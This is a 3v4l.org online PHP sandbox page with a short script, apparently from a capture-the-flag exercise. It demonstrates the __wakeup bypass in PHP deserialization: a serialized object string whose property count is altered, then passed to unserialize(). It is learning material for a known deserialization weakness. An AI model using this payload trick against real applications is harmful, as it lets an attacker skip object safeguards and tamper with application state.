3v4l.org

run code in 300+ PHP versions simultaneously
<?php // test.php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } // 测试1:正常反序列化 $obj = new xctf(); $ser = serialize($obj); echo "正常序列化: " . $ser . "\n\n"; // 测试2:修改数量后的字符串 $payload = 'O:4:"xctf":2:{s:4:"flag";s:3:"111";}'; echo "修改数量: " . $payload . "\n"; $result = unserialize($payload); var_dump($result); ?>

preferences:
44.42 ms | 726 KiB | 5 Q